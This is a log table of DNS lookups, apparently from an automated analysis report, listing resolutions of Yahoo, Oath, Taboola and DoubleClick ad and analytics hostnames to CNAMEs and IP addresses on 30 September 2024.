                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:56.656161070 CEST1.1.1.1192.168.2.40x6702No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:56.656161070 CEST1.1.1.1192.168.2.40x6702No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:56.656161070 CEST1.1.1.1192.168.2.40x6702No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.406642914 CEST1.1.1.1192.168.2.40xf18cNo error (0)guce.yahoo.comreal.rotation.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.406642914 CEST1.1.1.1192.168.2.40xf18cNo error (0)real.rotation.guce.aws.oath.cloudprod-rotation-v2.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.419795990 CEST1.1.1.1192.168.2.40xc956No error (0)guce.yahoo.comreal.rotation.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.419795990 CEST1.1.1.1192.168.2.40xc956No error (0)real.rotation.guce.aws.oath.cloudprod-rotation-v2.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.419795990 CEST1.1.1.1192.168.2.40xc956No error (0)prod-rotation-v2.guce.aws.oath.cloud52.31.79.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.419795990 CEST1.1.1.1192.168.2.40xc956No error (0)prod-rotation-v2.guce.aws.oath.cloud54.73.109.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.419795990 CEST1.1.1.1192.168.2.40xc956No error (0)prod-rotation-v2.guce.aws.oath.cloud3.248.117.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.474385023 CEST1.1.1.1192.168.2.40xce4No error (0)edge-mcdn.secure.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.475862026 CEST1.1.1.1192.168.2.40x8674No error (0)consent.cmp.oath.comcs550162656.adn.psicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.475862026 CEST1.1.1.1192.168.2.40x8674No error (0)cs550162656.adn.psicdn.net152.195.53.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.477092028 CEST1.1.1.1192.168.2.40x534aNo error (0)consent.cmp.oath.comcs550162656.adn.psicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.483669996 CEST1.1.1.1192.168.2.40xb8e8No error (0)edge-mcdn.secure.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.483669996 CEST1.1.1.1192.168.2.40xb8e8No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:57.483669996 CEST1.1.1.1192.168.2.40xb8e8No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.407835007 CEST1.1.1.1192.168.2.40x7745No error (0)guce.yahoo.comreal.rotation.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.407835007 CEST1.1.1.1192.168.2.40x7745No error (0)real.rotation.guce.aws.oath.cloudprod-rotation-v2.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.408466101 CEST1.1.1.1192.168.2.40x9e6No error (0)guce.yahoo.comreal.rotation.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.408466101 CEST1.1.1.1192.168.2.40x9e6No error (0)real.rotation.guce.aws.oath.cloudprod-rotation-v2.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.408466101 CEST1.1.1.1192.168.2.40x9e6No error (0)prod-rotation-v2.guce.aws.oath.cloud3.248.117.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.408466101 CEST1.1.1.1192.168.2.40x9e6No error (0)prod-rotation-v2.guce.aws.oath.cloud52.31.79.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.408466101 CEST1.1.1.1192.168.2.40x9e6No error (0)prod-rotation-v2.guce.aws.oath.cloud54.73.109.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.842744112 CEST1.1.1.1192.168.2.40x8433No error (0)udc.yahoo.comudc-ats.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.844433069 CEST1.1.1.1192.168.2.40x623fNo error (0)udc.yahoo.comudc-ats.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.844433069 CEST1.1.1.1192.168.2.40x623fNo error (0)udc-ats.media.g03.yahoodns.net188.125.72.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.897092104 CEST1.1.1.1192.168.2.40x7fa4No error (0)www.yahoo.comme-ycpi-cf-www.g06.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.897092104 CEST1.1.1.1192.168.2.40x7fa4No error (0)me-ycpi-cf-www.g06.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.897092104 CEST1.1.1.1192.168.2.40x7fa4No error (0)me-ycpi-cf-www.g06.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:58.949918985 CEST1.1.1.1192.168.2.40x45dfNo error (0)www.yahoo.comme-ycpi-cf-www.g06.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.406666040 CEST1.1.1.1192.168.2.40x92c9No error (0)noa.yahoo.comnoa-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.406666040 CEST1.1.1.1192.168.2.40x92c9No error (0)noa-atsv2.media.g03.yahoodns.net188.125.72.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.407722950 CEST1.1.1.1192.168.2.40x6716No error (0)noa.yahoo.comnoa-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.421685934 CEST1.1.1.1192.168.2.40x7fd2No error (0)securepubads.g.doubleclick.net142.250.185.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.422290087 CEST1.1.1.1192.168.2.40xd438No error (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.422301054 CEST1.1.1.1192.168.2.40x1ec7No error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.422301054 CEST1.1.1.1192.168.2.40x1ec7No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.422301054 CEST1.1.1.1192.168.2.40x1ec7No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.422301054 CEST1.1.1.1192.168.2.40x1ec7No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.422301054 CEST1.1.1.1192.168.2.40x1ec7No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.422983885 CEST1.1.1.1192.168.2.40xe773No error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.424330950 CEST1.1.1.1192.168.2.40x6857No error (0)opus.analytics.yahoo.comcs964.wpc.9465e.mucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.424330950 CEST1.1.1.1192.168.2.40x6857No error (0)cs964.wpc.9465e.mucdn.netcs964199420.wpc.mucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.424330950 CEST1.1.1.1192.168.2.40x6857No error (0)cs964199420.wpc.mucdn.net152.199.23.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.425031900 CEST1.1.1.1192.168.2.40xfabNo error (0)opus.analytics.yahoo.comcs964.wpc.9465e.mucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:00.425031900 CEST1.1.1.1192.168.2.40xfabNo error (0)cs964.wpc.9465e.mucdn.netcs964199420.wpc.mucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.658785105 CEST1.1.1.1192.168.2.40xf524No error (0)securepubads.g.doubleclick.net216.58.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.659874916 CEST1.1.1.1192.168.2.40xf48cNo error (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.795738935 CEST1.1.1.1192.168.2.40xe0cfNo error (0)ups.analytics.yahoo.comprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.795738935 CEST1.1.1.1192.168.2.40xe0cfNo error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.795738935 CEST1.1.1.1192.168.2.40xe0cfNo error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.795738935 CEST1.1.1.1192.168.2.40xe0cfNo error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.75.62.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.795738935 CEST1.1.1.1192.168.2.40xe0cfNo error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.71.149.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.795773029 CEST1.1.1.1192.168.2.40xbf52No error (0)ups.analytics.yahoo.comprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.795773029 CEST1.1.1.1192.168.2.40xbf52No error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.795773029 CEST1.1.1.1192.168.2.40xbf52No error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.796700001 CEST1.1.1.1192.168.2.40x8288No error (0)gps-aa.ybp.yahoo.comaws-bid-global.ybp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.796700001 CEST1.1.1.1192.168.2.40x8288No error (0)aws-bid-global.ybp.gysm.yahoodns.net54.154.153.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.796700001 CEST1.1.1.1192.168.2.40x8288No error (0)aws-bid-global.ybp.gysm.yahoodns.net52.212.59.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.811376095 CEST1.1.1.1192.168.2.40x86f6No error (0)gps-aa.ybp.yahoo.comaws-bid-global.ybp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.821861982 CEST1.1.1.1192.168.2.40x69feNo error (0)opus.analytics.yahoo.comcs964.wpc.9465e.mucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.821861982 CEST1.1.1.1192.168.2.40x69feNo error (0)cs964.wpc.9465e.mucdn.netcs964199420.wpc.mucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.821861982 CEST1.1.1.1192.168.2.40x69feNo error (0)cs964199420.wpc.mucdn.net152.199.23.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.823185921 CEST1.1.1.1192.168.2.40xf304No error (0)opus.analytics.yahoo.comcs964.wpc.9465e.mucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:01.823185921 CEST1.1.1.1192.168.2.40xf304No error (0)cs964.wpc.9465e.mucdn.netcs964199420.wpc.mucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:02.314826965 CEST1.1.1.1192.168.2.40xe67fNo error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:02.314826965 CEST1.1.1.1192.168.2.40xe67fNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:02.314826965 CEST1.1.1.1192.168.2.40xe67fNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:02.314826965 CEST1.1.1.1192.168.2.40xe67fNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:02.314826965 CEST1.1.1.1192.168.2.40xe67fNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:02.315388918 CEST1.1.1.1192.168.2.40x6bbdNo error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:02.507281065 CEST1.1.1.1192.168.2.40xce1eNo error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:02.507281065 CEST1.1.1.1192.168.2.40xce1eNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:02.507281065 CEST1.1.1.1192.168.2.40xce1eNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:02.507281065 CEST1.1.1.1192.168.2.40xce1eNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:02.507281065 CEST1.1.1.1192.168.2.40xce1eNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:02.508230925 CEST1.1.1.1192.168.2.40x3ba0No error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.766026974 CEST1.1.1.1192.168.2.40xec0eNo error (0)pa.ybp.yahoo.comd9z32kqpe67oo.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.766026974 CEST1.1.1.1192.168.2.40xec0eNo error (0)d9z32kqpe67oo.cloudfront.net18.239.36.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.766026974 CEST1.1.1.1192.168.2.40xec0eNo error (0)d9z32kqpe67oo.cloudfront.net18.239.36.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.766026974 CEST1.1.1.1192.168.2.40xec0eNo error (0)d9z32kqpe67oo.cloudfront.net18.239.36.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.766026974 CEST1.1.1.1192.168.2.40xec0eNo error (0)d9z32kqpe67oo.cloudfront.net18.239.36.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.769885063 CEST1.1.1.1192.168.2.40x4cfcNo error (0)pa.ybp.yahoo.comd9z32kqpe67oo.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.928842068 CEST1.1.1.1192.168.2.40x1fd1No error (0)securepubads.g.doubleclick.net172.217.16.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.930124044 CEST1.1.1.1192.168.2.40x592No error (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.940429926 CEST1.1.1.1192.168.2.40xe888No error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.941171885 CEST1.1.1.1192.168.2.40x635dNo error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.941171885 CEST1.1.1.1192.168.2.40x635dNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.941171885 CEST1.1.1.1192.168.2.40x635dNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.941171885 CEST1.1.1.1192.168.2.40x635dNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:03.941171885 CEST1.1.1.1192.168.2.40x635dNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.015803099 CEST1.1.1.1192.168.2.40x888bNo error (0)ups.analytics.yahoo.comprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.015803099 CEST1.1.1.1192.168.2.40x888bNo error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.015803099 CEST1.1.1.1192.168.2.40x888bNo error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.016211987 CEST1.1.1.1192.168.2.40x5c32No error (0)ups.analytics.yahoo.comprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.016211987 CEST1.1.1.1192.168.2.40x5c32No error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.016211987 CEST1.1.1.1192.168.2.40x5c32No error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.016211987 CEST1.1.1.1192.168.2.40x5c32No error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.75.62.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.016211987 CEST1.1.1.1192.168.2.40x5c32No error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.71.149.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.968386889 CEST1.1.1.1192.168.2.40x8020No error (0)beacon.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.968386889 CEST1.1.1.1192.168.2.40x8020No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.968386889 CEST1.1.1.1192.168.2.40x8020No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.968386889 CEST1.1.1.1192.168.2.40x8020No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.968386889 CEST1.1.1.1192.168.2.40x8020No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:04.969785929 CEST1.1.1.1192.168.2.40xbd2cNo error (0)beacon.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:05.336479902 CEST1.1.1.1192.168.2.40x931eNo error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:05.337034941 CEST1.1.1.1192.168.2.40x32e7No error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:05.337034941 CEST1.1.1.1192.168.2.40x32e7No error (0)dualstack.tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:05.337034941 CEST1.1.1.1192.168.2.40x32e7No error (0)dualstack.tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:05.337034941 CEST1.1.1.1192.168.2.40x32e7No error (0)dualstack.tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:05.337034941 CEST1.1.1.1192.168.2.40x32e7No error (0)dualstack.tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:06.460779905 CEST1.1.1.1192.168.2.40x1452No error (0)api.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:06.460779905 CEST1.1.1.1192.168.2.40x1452No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:06.460779905 CEST1.1.1.1192.168.2.40x1452No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:06.460779905 CEST1.1.1.1192.168.2.40x1452No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:06.460779905 CEST1.1.1.1192.168.2.40x1452No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:06.461431026 CEST1.1.1.1192.168.2.40xbd23No error (0)api.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.219470024 CEST1.1.1.1192.168.2.40x7f7eNo error (0)pm-widget.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.219470024 CEST1.1.1.1192.168.2.40x7f7eNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.219470024 CEST1.1.1.1192.168.2.40x7f7eNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
